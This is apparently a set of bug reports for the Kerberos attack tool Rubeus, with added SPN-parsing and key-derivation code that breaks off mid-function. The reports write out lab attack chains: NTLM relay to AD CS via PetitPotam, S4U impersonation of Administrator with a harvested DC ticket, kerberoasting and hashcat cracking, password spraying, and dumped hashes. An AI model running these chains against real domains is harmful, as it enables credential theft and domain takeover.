[X] Error: invalid TGS_REQ sname 'HTTP/computer.domain.local:10000/CN=Users,DC=domain,DC=local'
[X] KRB-ERROR (60) : KRB_ERR_GENERIC
[X] KRB-ERROR (7) : KDC_ERR_S_PRINCIPAL_UNKNOWN
[X] KRB-ERROR (7) : KDC_ERR_S_PRINCIPAL_UNKNOWN

Removing the "/CN=Users,DC=domain,DC=local" portion resolves the issue.

Full output:
w/o rc4opsec

[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Searching the current domain for Kerberoastable users

[*] Total kerberoastable users : 1


[*] SamAccountName         : user
[*] DistinguishedName      : CN=user,CN=Users,DC=domain,DC=local
[*] ServicePrincipalName   : HTTP/computer.domain.local:10000/CN=Users,DC=domain,DC=local
[*] PwdLastSet             : 3/10/2020 3:11:27 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*<snip>

w/ rc4opsec

[*] Action: Kerberoasting

[*] Using 'tgtdeleg' to request a TGT for the current user
[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will be requested for everything else
[*] Searching the current domain for Kerberoastable users
[*] Searching for accounts that only support RC4_HMAC, no AES

[*] Total kerberoastable users : 1


[*] SamAccountName         : user
[*] DistinguishedName      : CN=user,CN=Users,DC=domain,DC=local
[*] ServicePrincipalName   : HTTP/computer.domain.local:10000/CN=Users,DC=domain,DC=local
[*] PwdLastSet             : 3/10/2020 3:11:27 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[X] Error: invalid TGS_REQ sname 'HTTP/computer.domain.local:10000/CN=Users,DC=domain,DC=local'

[X] KRB-ERROR (60) : KRB_ERR_GENERIC


[X] KRB-ERROR (7) : KDC_ERR_S_PRINCIPAL_UNKNOWN


[X] KRB-ERROR (7) : KDC_ERR_S_PRINCIPAL_UNKNOWN

I've also experienced this issue in other environments, however the error was the same as #42 rather than the above.
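
The invalid sname above and the Error 1312 report earlier ("asdf/asdf/blahblah.local") both come from treating every "/" in an SPN as a separator. Microsoft's SPN format is serviceclass/host[:port-or-instance][/servicename], and only the first two slashes delimit components; the optional service name may itself contain slashes, colons and commas (an LDAP DN, as in this issue). The parser below is an added example, not Rubeus code: the Spn class and parse_spn are my own names, the SPNs from the two issues are used as inputs, and the MSSQLSvc instance sample is constructed.

```python
# Added example (not Rubeus code): structural parser for Kerberos SPNs that
# keeps a three-part SPN's service name intact instead of splitting on every "/".
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Spn:
    service_class: str
    host: str
    port: Optional[int] = None        # numeric suffix after ":"
    instance: Optional[str] = None    # non-numeric suffix after ":" (e.g. MSSQLSvc/host:INSTANCE)
    service_name: Optional[str] = None

    def components(self) -> List[str]:
        """Slash-separated components, as they appear in the SPN string."""
        host_part = self.host
        if self.port is not None:
            host_part += f":{self.port}"
        elif self.instance is not None:
            host_part += f":{self.instance}"
        parts = [self.service_class, host_part]
        if self.service_name is not None:
            parts.append(self.service_name)
        return parts

    def __str__(self) -> str:
        return "/".join(self.components())


def parse_spn(spn: str) -> Spn:
    """Split an SPN into at most three components; only the first two slashes separate."""
    parts = spn.split("/", 2)              # maxsplit=2 keeps slashes inside the service name
    if len(parts) < 2 or not parts[0] or not parts[1]:
        raise ValueError(f"malformed SPN (need serviceclass/host): {spn!r}")
    service_class, host_part = parts[0], parts[1]
    service_name = parts[2] if len(parts) == 3 else None
    if service_name == "":
        raise ValueError(f"malformed SPN (empty service name): {spn!r}")
    host, sep, suffix = host_part.partition(":")
    if not sep:
        return Spn(service_class, host_part, service_name=service_name)
    if not host or not suffix:
        raise ValueError(f"malformed SPN (empty host or port): {spn!r}")
    if suffix.isdigit():
        return Spn(service_class, host, port=int(suffix), service_name=service_name)
    return Spn(service_class, host, instance=suffix, service_name=service_name)


def is_three_part(spn: str) -> bool:
    """True when the SPN carries a service-name component, the case that tripped Rubeus."""
    return parse_spn(spn).service_name is not None


# Inputs taken from the two issues plus one constructed instance-style SPN.
SAMPLE_SPNS = [
    "CIFS/test-dc1.test.local",
    "asdf/asdf/blahblah.local",
    "HTTP/computer.domain.local:10000/CN=Users,DC=domain,DC=local",
    "MSSQLSvc/sql01.domain.local:SQLEXPRESS",   # constructed sample
]

if __name__ == "__main__":
    for s in SAMPLE_SPNS:
        p = parse_spn(s)
        print(f"{s!r} -> {p.components()} (three-part: {is_three_part(s)})")
```

The round-trip property (str(parse_spn(s)) == s) is the quick check that a parser has not lost part of the name; a request built from a lossy split is what the KDC answers with KDC_ERR_S_PRINCIPAL_UNKNOWN.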

Replace checks for "NT Authority\System" string with SID comparison

There's a few places where the code checks to see if it is running as Local System by doing this:

var currentName = WindowsIdentity.GetCurrent().Name;
if (currentName == "NT AUTHORITY\\SYSTEM")

Which I'm pretty sure won't work on non English versions of Windows (because in French for example the account name would be "AUTORITE NT/Systeme").
Plus it just generally seems like a better idea to compare our SID to the well known Local System SID, rather than comparing account name strings. So I propose changing to this instead:

var currentSid = WindowsIdentity.GetCurrent().User;
if (currentSid.IsWellKnown(WellKnownSidType.LocalSystemSid))

Does anyone have a clue on KDC_ERR_CLIENT_NOT_TRUSTED?

I'm trying to reproduce the AD CS replay issue here: https://pentestlab.blog/2021/09/14/petitpotam-ntlm-relay-to-ad-cs/

Environment (All Windows machine are joined in domain)

  1. Windows 2016 DC (10.10.10.9)
  2. Windows 2016 AD CS (10.10.10.4)
  3. Ubuntu 20.04 as attack machine (10.10.10.6)
  4. Windows 2016 (10.10.10.5)

Steps

  1. Run ntlmrelayx.py -debug -smb2support --target http://10.10.10.4/certsrv/certfnsh.asp --adcs --template KerberosAuthentication on Ubuntu machine
  2. Run PetitPotam.py -u lowpriv -p XXXX 10.10.10.6 10.10.10.9 on Ubuntu machine
  3. Run Rubeus.exe asktgt /user:DC$ /certificate:XXX /ptt on 10.10.10.5

ntlmrelayx successfully generated the certificate, but when I do the ptt step with Rubeus:

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject:
[*] Building AS-REQ (w/ PKINIT preauth) for: 'corp.com\DC$'

[X] KRB-ERROR (62) : KDC_ERR_CLIENT_NOT_TRUSTED

I'm using the latest release (last commit 4 days ago).

Error/Dump with asktgt in Rubeus 2.0

If I run an asktgt using certificates (i.e., smartcard): asktgt /user: /domain: /dc: /certificate: /password: /ptt, where the <> fields in the previous example have been sanitized, the following error happens in Rubeus 2.0 (and a few versions previously):

[*] Action: Ask TGT
[!] Unhandled Rubeus exception:

System.Security.Cryptography.CryptographicException: Cannot find the requested object.
   at System.Security.Cryptography.CryptographicException.ThrowCryptographicException(Int32 hr)
   at System.Security.Cryptography.X509Certificates.X509Utils._QueryCertBlobType(Byte[] rawData)
   at System.Security.Cryptography.X509Certificates.X509Certificate.LoadCertificateFromBlob(Byte[] rawData, Object password, X509KeyStorageFlags keyStorageFlags)
   at System.Security.Cryptography.X509Certificates.X509Certificate2..ctor(Byte[] rawData, String password)
   at Rubeus.Ask.TGT(String userName, String domain, String certFile, String certPass, KERB_ETYPE etype, String outfile, Boolean ptt, String domainController, LUID luid, Boolean describe, Boolean verifyCerts, String servicekey, Boolean getCredentials)
   at Rubeus.Commands.Asktgt.Execute(Dictionary`2 arguments)
   at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at Rubeus.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)

If the same exact command is run with v1.5.0 it works as expected (when the certificate support was added). I started noticing this around v1.7.0 and hoped it would be noticed/reported, but since it hasn't, here we are.

brute abruptly stops at Password expire match

While running a password brute force against Kerberos, using one password against a set list of users,
in the scenario where the password matches for a user but is expired, Rubeus abruptly stops brute forcing against the rest of the users and throws the result with the error for the expired password: Kerberos Error 23: KDC_ERR_KEY_EXPIRED

Unable to find any variable that I can set to prevent this from happening.

ASRepRoasting from non domain machine gets wrong IP address for DC

Trying to AS-REP roast from a non-domain machine without specifying the DC name (with the DNS server set to point to the DC), like so:

Rubeus.exe asreproast /creduser:htb.local\j.smith /credpassword:passw0rd /domain:htb.local

Fails like this:

[X] Error 1355 retrieving domain controller : The specified domain either does not exist or could not be contacted
[*] Using domain controller:  (fe80::d561:f8ed:7de4:ce8a%25)
[*] Building AS-REQ (w/o preauth) for: 'htb.local\test'
[X] Error connecting to fe80::d561:f8ed:7de4:ce8a%25:88 : No connection could be made because the target machine actively refused it fe80::d561:f8ed:7de4:ce8a%25:88

because the GetDCIP function runs the code below and seems to expect that a DC has been specified. So when the DC name string is null, it just gets the IP addresses of the local machine (in my case I guess the first one it found was an IPv6 one):

System.Net.IPAddress[] dcIPs = System.Net.Dns.GetHostAddresses(DCName);

Working on a PR at the moment that fixes this and also fixes #33

Windows 7 x32 error

Are x32 systems supported?
Running dump on Windows 7 x32 gives
[X] Error 87 calling LsaCallAuthenticationPackage for target ... : The parameter is incorrect.
with both the AnyCpu and x86 builds.
Seems like a KERB_RETRIEVE_TKT_REQUEST structure size error.

KDC_ERR_S_PRINCIPAL_UNKNOWN while doing S4U

I'm reading this article and trying to reproduce the "windows object permission backdoor".

Environment:

  1. Windows 2016 DC (10.10.10.20) as domain controller of testnet.com
  2. Windows 2016 SRV1 (10.10.10.22) as victim, domain joined
  3. Windows 2016 SRV2 (10.10.10.23) as attack machine, domain joined

Accounts:

  1. TESTNET\admin in DA group
  2. TESTNET\lowpriv as local administrator of SRV2

Steps:

  1. In ADSI manually add Full Control permission of SRV1$ to [email protected]
  2. Log in with TESTNET\lowpriv to SRV2 and launch the modified version of https://gist.github.com/HarmJ0y/a1ae1cf09e5ac89ee15fb3da25dcb10a
  3. Verify msDS-AllowedToDelegateTo is successfully modified for [email protected]
  4. Run Rubeus.exe s4u /user:lowpriv /rc4:XXX /impersonateuser:admin /msdsspn:CIFS/SRV1.testnet.com /ptt

Problems:

  1. setspn -Q */* | find /i "CIFS" shows CIFS/SRV1.testnet.com is not present, so I registered one with
    setspn -A CIFS/SRV1 SRV1$
    setspn -A CIFS/SRV1.testnet.com SRV1$
    
  2. S4U failed
    [*] Action: S4U
    
    [*] Using domain controller: DC-01.testnet.com (10.10.10.20)
    [*] Building S4U2self request for: '[email protected]'
    [*] Sending S4U2self request
    
    [X] KRB-ERROR (7) : KDC_ERR_S_PRINCIPAL_UNKNOWN
    
    [X] S4U2Self failed, unable to perform S4U2Proxy.
    

Can you help?

Unhandled Exception: System.OverflowException: Value was either too large or too small for a UInt32.

Hello guys,

I am using the monitor action in order to grab TGTs after a successful "attack" against the "Print Spooler" service that is running on a domain host (in our case LABS-DC01$).

UserName                 : LABS-DC01$
Domain                   : LABS
LogonId                  : 4773477
UserSID                  : S-1-5-21-1871540109-507438259-1164035318-1001
AuthenticationPackage    : Kerberos
LogonType                : Network
LogonTime                : 2/1/2019 10:14:21 AM
LogonServer              :
LogonServerDNSDomain     : LABS.COM
UserPrincipalName        :

ServiceName              : krbtgt/LABS.COM
TargetName               :
ClientName               : LABS-DC01$
DomainName               : LABS.COM
TargetDomainName         : LABS.COM
AltTargetDomainName      : LABS.COM
SessionKeyType           : aes256_cts_hmac_sha1
Base64SessionKey         : EFzxu0gMFHnvXEA81575frbhPdKySWK/Y871RmTAaf4=
KeyExpirationTime        : 1/1/1601 2:00:00 AM
TicketFlags              : name_canonicalize, pre_authent, renewable, forwarded, forwardable
StartTime                : 2/1/2019 10:25:38 AM
EndTime                  : 2/1/2019 8:25:37 PM
RenewUntil               : 2/8/2019 10:25:37 AM
TimeSkew                 : 0
EncodedTicketSize        : 1298
Base64EncodedTicket      :

  doIFDjCCBQqgAwIBBaEDAgEWooIEHTCCBBlhggQVMIIEEaADAgEFoQobCExBQlMuQ09Noh0wG6ADAgECoRQwEhsGa3JidGd0GwhM
  QUJTLkNPTaOCA90wggPZoAMCARKhAwIBAqKCA8sEggPHCHEZUk6cFgzygCwKDHNBIOzsASgUU71oObTLeO3+auqYTSBSpk3k6LPq
  bJerplsgo7iijLdZeTDRcHeNjS66MC6z4pFO+xgsjIWEpI/f3Ou4gozQi2goglKoZ/suixrQyRxJCYl7VZZtyqwrR6m19N2dGAXG
  BmI1mKiJCtEkYnew8d2QrKuNoWHSPjK8Yf0sF93u76foKCokjYYr9Em5Lys37oH5iHaHGOmJF87OoZtmPPQ0vilEeD9Atc5dLhGw
  qPXG0fnjn3Z4ysMWHuKpOTpT37NBjYZK3zrPLsHjznC4fRrSQNIooXk47dHPSyAeS4vZpYx3RF2flC4rM9TdK2esks7IM15LWhfM
  1Le1dRwlFuFWKxMXBl9uNj8D2ZsopHZIA/b+PKo0vItpLKE7XsNUHA+sPMxIRd8xpkFqGvFpYLhK025W9lS/cpS9c+TTh4VbbQJG
  cWXcuw5Saj3VSr3hY3U5xBuyGfB7F448wm+dqwNVshdAoR/EXcAD4Qd2Qe8pHtHLv5IZdgpUBbIj9fYrm9UpS1tZrD2UCXnLcB2E
  6E3NP+uAZpqnIDT1XXfpc/7W9Cfu1UcAxRBNFehRXWtxFShH4dKPF3Q59MOOQ8dXCKBQdt3fwrVLqVCHHJ/VOwHg3nYBhkVVtKw0
  rmmumtvuQ5C+JjCQj96/VjNLeZLVrPMHpFgTm08BSNyQ80iTFRQcdD80KJE2IduODatyy3Lnn6W1G7tts52X8rY+wslppciWI/CY
  rTnjcLw+MmqNuiL1iQrgIOnYUPU+wUJSCZvDpc/LwW6ovPzyKqz4poM5K9U2b+CdTxJlOrOaPKyKbqPr7ZKyTTIe+3ZDjcx8N6M6
  BxvOm04PhdWEoqPRDAySF2A/x90AqklxuP46eQ8ppZ89pXhzXTbWc1GQ+MyPV42pWK1ZEMSPtCRufN7uu1SYMxDC7BqIpEjvVxeC
  O9/lEhkRdWOu20yK0krmlNM/FX4/pU9pSEtWp+dhWUTV1nsrD75PmO1xUjV3dwyaXtD3ciK9XbTglg+iSgukNaicBiBdA3P4G/H0
  PzO6BsLOGUEIhyEXCFNGl4KEWzm176k+jQoQjbtocDoSlah2n9lNe8kjHd1TEAKFmRLaOacPxz3UdLdP8xB/umspeuJ3V2H+y1H4
  5fkJ5V4WdLtVHDpaPocdWeNB7/jMrxP5g1HFnpU4LsAcZeHC0YSDPSbZCdefD8uAh9dt8AEKIl4sEwWCKnPhGG7PyeZmebbO0Xji
  dbnv00m6W9eomfTjCGNQxNAj3Y57KWZRHKOB3DCB2aADAgEAooHRBIHOfYHLMIHIoIHFMIHCMIG/oCswKaADAgESoSIEIBBc8btI
  DBR571xAPNee+X624T3Sskliv2PO9UZkwGn+oQobCExBQlMuQ09NohcwFaADAgEBoQ4wDBsKTEFCUy1EQzAxJKMHAwUAYKEAAKUR
  GA8yMDE5MDIwMTA4MjUzOFqmERgPMjAxOTAyMDExODI1MzdapxEYDzIwMTkwMjA4MDgyNTM3WqgKGwhMQUJTLkNPTakdMBugAwIB
  AqEUMBIbBmtyYnRndBsITEFCUy5DT00=

Then, I am using the s4u action with the harvested TGT ticket (I have provided it both in raw base64 format and in .kirbi format after proper conversion) in order to impersonate a Domain Admin account and get a TGS ticket for the CIFS service on the DC.

The problem is that I am getting the following error during the execution of the s4u action:
Execution of S4U Action:
.\Rubeus.exe s4u /impersonateuser:Administrator /ticket:<base64-ticket-value> /msdsspn:cifs/labs-dc01.labs.com

OR:

[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<base64-ticket-value>"))
.\Rubeus.exe s4u /impersonateuser:Administrator /ticket:ticket.kirbi /msdsspn:cifs/labs-dc01.labs.com

Error:

[*] Action: S4U
[*] Using domain controller: LABS-DC01.labs.com (10.10.10.20)
[*] Building S4U2self request for: 'LABS.COM\LABS-DC01$'
[*] Impersonating user 'Administrator' to target SPN 'cifs/labs-dc01.labs.com'
[*] Sending S4U2self request
[*] Connecting to 10.10.10.20:88
[*] Sent 1458 bytes
[*] Received 1482 bytes
[+] S4U2self success!
[*] Building S4U2proxy request for service: 'cifs/labs-dc01.labs.com'
[*] Sending S4U2proxy request
[*] Connecting to 10.10.10.20:88
[*] Sent 2557 bytes
[*] Received 127 bytes
Unhandled Exception: System.OverflowException: Value was either too large or too small for a UInt32.
at System.Convert.ToUInt32(Int64 value)
at Rubeus.KRB_ERROR..ctor(AsnElt body)
at Rubeus.S4U.Execute(KRB_CRED kirbi, String targetUser, String targetSPN, Boolean ptt, String domainController, String altService)
at Rubeus.Commands.S4u.Execute(Dictionary`2 arguments)
at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)

Is that an issue indeed, or am I missing something?

Getting the domain controller

I was having an issue getting the domain controller during my testing of the kerberoasting functionality. The issue seems to be the function GetDCName(). Note, I ran this with and without the built-in impersonation, and using the SimpleImpersonation library. My solution for my very specific use case was to modify the GetDCName() code as follows:

if (ERROR_SUCCESS == val)
{
    domainInfo = (Interop.DOMAIN_CONTROLLER_INFO)Marshal.PtrToStructure(pDCI, typeof(Interop.DOMAIN_CONTROLLER_INFO));
    string dcName = domainInfo.DomainControllerName;
    Interop.NetApiBufferFree(pDCI);
    return dcName.Trim('\\');
}
else
{
    try
    {
        // modified part: fall back to the PDC emulator reported by the directory when DsGetDcName fails
        string pdc = System.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain().PdcRoleOwner.Name;
        return pdc;
    }
    catch
    {
        string errorMessage = new Win32Exception((int)val).Message;
        Console.WriteLine("\r\n [X] Error {0} retrieving domain controller : {1}", val, errorMessage);
        Interop.NetApiBufferFree(pDCI);
        return "";
    }
}

This seems to have solved my little issue. But just wanted to let you know.

LsaRegisterLogonProcess incorrect signature

Executing x86 Rubeus dump on Windows 7 x64 gives an error such as:

Action: Dump Kerberos Ticket Data (All Users)

[*] Current LUID    : *******

[X] Exception: Rubeus.lib.Interop.NtException: NTSTATUS error code 0xC0000140: Unknown error (0xc0000140)
   at Rubeus.LSA.EnumerateTickets(Boolean extractTicketData, LUID targetLuid, String targetService, String targetUser, String targetServer, Boolean includeComputerAccounts, Boolean silent)

[!] Unhandled Rubeus exception:

System.NullReferenceException: Object reference not set to an instance of an object.
   at Rubeus.LSA.DisplaySessionCreds(List`1 sessionCreds, TicketDisplayFormat displayFormat, Boolean showAll)
   at Rubeus.Commands.Dump.Execute(Dictionary`2 arguments)
   at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at Rubeus.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)

After inspecting the LsaRegisterLogonProcess P/Invoke signature and MSDN, I've found that the 'ref' specifier is missing on the first argument.

[DllImport("secur32.dll", SetLastError = true)]
public static extern int LsaRegisterLogonProcess(
    LSA_STRING_IN LogonProcessName,
    out IntPtr LsaHandle,
    out ulong SecurityMode
);

Proof: (https://docs.microsoft.com/en-us/windows/win32/api/ntsecapi/nf-ntsecapi-lsaregisterlogonprocess) [in] PLSA_STRING LogonProcessName : Pointer to an LSA_STRING structure identifying the logon application.

So, the signature should be:

[DllImport("secur32.dll", SetLastError = true)]
public static extern int LsaRegisterLogonProcess(
    ref LSA_STRING_IN LogonProcessName,
    out IntPtr LsaHandle,
    out ulong SecurityMode
);

and call:

public static IntPtr LsaRegisterLogonProcessHelper()
{
    // helper that establishes a connection to the LSA server and verifies that the caller is a logon application
    //  used for Kerberos ticket enumeration for ALL users

    var logonProcessName = "User32LogonProcesss"; // yes I know this is "weird" ;)
    Interop.LSA_STRING_IN LSAString;
    var lsaHandle = IntPtr.Zero;
    UInt64 securityMode = 0;

    LSAString.Length = (ushort)logonProcessName.Length;
    LSAString.MaximumLength = (ushort)(logonProcessName.Length + 1);
    LSAString.Buffer = logonProcessName;

    var ret = Interop.LsaRegisterLogonProcess(ref LSAString, out lsaHandle, out securityMode);

    return lsaHandle;
}

Cross-domain S4U Bug

On this line

s4u2proxyReq.req_body.kdcOptions = s4u2proxyReq.req_body.kdcOptions | Interop.KdcOptions.CNAMEINADDLTKT;

CNAMEINADDLTKT needs to be changed to CONSTRAINED_DELEGATION for proper cross-domain S4U usage. Thanks to @0xe7 for discovery and fix.

Consider adding a Rubeus.exe.config

To run on .NET 4.X without recompile and retargeting, you need to create a Rubeus.exe.config:

<?xml version="1.0" encoding="utf-8"?>
<configuration>
    <startup>
        <supportedRuntime version="v2.0.50727"/>
        <supportedRuntime version="v4.0"/>
    </startup>
</configuration>

Can you add it to the VS project?

Kerberoasting seems not to work correctly

It seems like the Kerberoast functionality is not working correctly.
Cracking the hash with tgsrepcrack works fine:

However with Rubeus it does not work ...

.\Rubeus.exe kerberoast /tgtdeleg /outfile:hashes.txt /format:hashcat /spn:"MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: Kerberoasting

[*] Using 'tgtdeleg' to request a TGT for the current user
[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will be requested for everything else

[*] Target SPN             : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local
[*] Hash written to C:\AD\kerberoast\hashes.txt

[*] Roasted hashes written to : C:\AD\kerberoast\hashes.txt

as cracking with hashcat fails:

.\hashcat64.exe -m 13100 --force .\hashes.txt -a 0 .\wordlists\10k-worst-pass.txt

Session..........: hashcat
Status...........: Exhausted
Hash.Type........: Kerberos 5 TGS-REP etype 23
Hash.Target......: $krb5tgs$23$*USER$DOMAIN$MSSQLSvc/dcorp-mgmt.dollar...ad4360
Time.Started.....: Tue Feb 18 15:49:29 2020 (0 secs)
Time.Estimated...: Tue Feb 18 15:49:29 2020 (0 secs)
Guess.Base.......: File (.\wordlists\10k-worst-pass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   202.2 kH/s (5.59ms) @ Accel:4 Loops:1 Thr:64 Vec:1
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 10009/10009 (100.00%)
Rejected.........: 0/10009 (0.00%)
Restore.Point....: 10009/10009 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: ramones -> eyphed

AskTgt and AskTgs fail to find domain controller on non domain machines

If you run this from a non-domain machine:

Rubeus.exe asktgt /user:test /password:passw0rd /domain:kerb.local

You get the following error:

v2.0.0

[*] Action: Ask TGT

[*] Using rc4_hmac hash: B9F917853E3DBF6E6831ECCE60725930
[*] Building AS-REQ (w/ preauth) for: 'kerb.local\test'

 [X] Error 1355 retrieving domain controller : The specified domain either does not exist or could not be contacted
[X] Error: No domain controller could be located

[X] Unable to get domain controller address

Of course you can manually specify a domain controller with /dc but you shouldn't have to do this and none of the other commands require this.

It looks like it's because, even though the GetDCIP function accepts a domain name, AskTgt doesn't provide one to it (even though it knows the domain name at that point).

Fingerprint issue

The nonce and sequence number should be randomized:

%> grep 1818848256 -R
Rubeus/lib/krb_structures/EncKrbPrivPart.cs:            seq_number = 1818848256;
Rubeus/lib/krb_structures/EncKrbPrivPart.cs:            seq_number = 1818848256;
Rubeus/lib/krb_structures/KDC_REQ_BODY.cs:            nonce = 1818848256;
Rubeus/lib/Reset.cs:            ap_req.authenticator.seq_number = 1818848256;

AES_256 not generated correctly for Computer Accounts

Secrets Dump of Computer Account:

Impacket v0.9.22.dev1+20200713.100928.1e84ad60 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
KNOWNPASS$:5604:aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29:::
[*] Kerberos keys grabbed
KNOWNPASS$:aes256-cts-hmac-sha1-96:fab6a368ec18a579bd20e1841050506c78c729523269053f356711cb60fdc804
KNOWNPASS$:aes128-cts-hmac-sha1-96:e3c578d8ca4081b338ebc46da11d84cf
KNOWNPASS$:des-cbc-md5:23e994e623d9a7da
[*] Cleaning up...

Rubeus Run with Dollar Sign:

PS C:\tools\Rubeus\Rubeus\bin\Release> .\Rubeus.exe hash /password:ASDqwe123 /user:KNOWNPASS$ /domain:SITTINGDUCK.INFO

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: Calculate Password Hash(es)

[*] Input password             : ASDqwe123
[*] Input username             : KNOWNPASS$
[*] Input domain               : SITTINGDUCK.INFO
[*] Salt                       : SITTINGDUCK.INFOKNOWNPASS$
[*]       rc4_hmac             : 88E4D9FABAECF3DEC18DD80905521B29
[*]       aes128_cts_hmac_sha1 : 19DCD95F5BFC708EB0B55FACB957A8AE
[*]       aes256_cts_hmac_sha1 : 779030492A1FEC903958A23BDF66E6B948AA50593D8B54BE2241D6B5C6C6EDFD
[*]       des_cbc_md5          : B6ADDC3E9B025864

Rubeus Run without Dollar Sign:

PS C:\tools\Rubeus\Rubeus\bin\Release> .\Rubeus.exe hash /password:ASDqwe123 /user:KNOWNPASS /domain:SITTINGDUCK.INFO

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: Calculate Password Hash(es)

[*] Input password             : ASDqwe123
[*] Input username             : KNOWNPASS
[*] Input domain               : SITTINGDUCK.INFO
[*] Salt                       : SITTINGDUCK.INFOKNOWNPASS
[*]       rc4_hmac             : 88E4D9FABAECF3DEC18DD80905521B29
[*]       aes128_cts_hmac_sha1 : B6164E916BC05830B9211A4B7C148EFC
[*]       aes256_cts_hmac_sha1 : 7AD0ED9CB365687EEAA29D971BD88ACF2C9F4766C21B99DAACDA373DD78EF0A6
[*]       des_cbc_md5          : 862CBA803D25738F

Neither the AES128 nor the AES256 matches up for the computer account:

  • AES256 Dump - FAB6A368EC18A579BD20E1841050506C78C729523269053F356711CB60FDC804

  • AES256 CMP$ - 779030492A1FEC903958A23BDF66E6B948AA50593D8B54BE2241D6B5C6C6EDFD

  • AES256 CMP - 7AD0ED9CB365687EEAA29D971BD88ACF2C9F4766C21B99DAACDA373DD78EF0A6

  • AES128 Dump - E3C578D8CA4081B338EBC46DA11D84CF

  • AES128 CMP$ - 19DCD95F5BFC708EB0B55FACB957A8AE

  • AES128 CMP - B6164E916BC05830B9211A4B7C148EFC
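The mismatch above comes from the salt, which the reporter's Rubeus output shows as SITTINGDUCK.INFOKNOWNPASS$: Active Directory salts computer-account keys with the host form of the principal (uppercase realm, then "host", then the lowercase hostname without the trailing $, then "." and the lowercase realm), not with REALM + sAMAccountName as it does for user accounts. The Go program below is an added example, not code from Rubeus or from the reporter, implementing RFC 3962 AES string-to-key with both salt rules so that a key a tool computes can be checked against what the directory actually stores. PBKDF2-HMAC-SHA1 and the n-folded "kerberos" constant are written inline so it needs only the standard library; the realm, account names and password in main are the values shown in the issue, and the 4096 iteration count is the RFC 3962 default.

```go
package main

import (
	"crypto/aes"
	"crypto/hmac"
	"crypto/sha1"
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"strings"
)

// kerberosSalt applies the Active Directory salt rules (MS-KILE 3.1.1.2):
// user accounts salt with REALM + sAMAccountName, computer accounts with
// REALM + "host" + lowercase hostname + "." + lowercase realm.
func kerberosSalt(realm, samAccountName string) string {
	upper := strings.ToUpper(realm)
	if strings.HasSuffix(samAccountName, "$") {
		host := strings.ToLower(strings.TrimSuffix(samAccountName, "$"))
		return upper + "host" + host + "." + strings.ToLower(realm)
	}
	return upper + samAccountName
}

// pbkdf2SHA1 is PBKDF2-HMAC-SHA1 (RFC 2898) written out so the program needs
// only the standard library.
func pbkdf2SHA1(password, salt []byte, iter, keyLen int) []byte {
	var out []byte
	for block := uint32(1); len(out) < keyLen; block++ {
		mac := hmac.New(sha1.New, password)
		mac.Write(salt)
		var idx [4]byte
		binary.BigEndian.PutUint32(idx[:], block)
		mac.Write(idx[:])
		u := mac.Sum(nil)
		t := append([]byte(nil), u...)
		for i := 1; i < iter; i++ {
			mac = hmac.New(sha1.New, password)
			mac.Write(u)
			u = mac.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// nfoldKerberos is the 128-bit n-fold of the constant "kerberos" (RFC 3961 A.1).
var nfoldKerberos, _ = hex.DecodeString("6b65726265726f737b9b5b2b93132b93")

// aesStringToKey implements RFC 3962 string-to-key: PBKDF2-HMAC-SHA1 over the
// salted password, then DK(tkey, "kerberos"), which for AES chains the block
// cipher over the n-folded constant (K1 = E(n-fold), K2 = E(K1), ...) until
// keyLen bytes exist. keyLen is 16 for aes128-cts and 32 for aes256-cts.
func aesStringToKey(password, salt string, iter, keyLen int) ([]byte, error) {
	tkey := pbkdf2SHA1([]byte(password), []byte(salt), iter, keyLen)
	c, err := aes.NewCipher(tkey)
	if err != nil {
		return nil, err
	}
	key := make([]byte, 0, keyLen)
	block := append([]byte(nil), nfoldKerberos...)
	for len(key) < keyLen {
		c.Encrypt(block, block) // in place; one-block CTS with a zero IV is plain AES
		key = append(key, block...)
	}
	return key[:keyLen], nil
}

func main() {
	// Constructed sample using the principal values shown in the issue above;
	// the password is the one the reporter typed, not a real credential.
	const realm, password, iterations = "SITTINGDUCK.INFO", "ASDqwe123", 4096
	for _, sam := range []string{"KNOWNPASS$", "KNOWNPASS"} {
		salt := kerberosSalt(realm, sam)
		k, _ := aesStringToKey(password, salt, iterations, 32)
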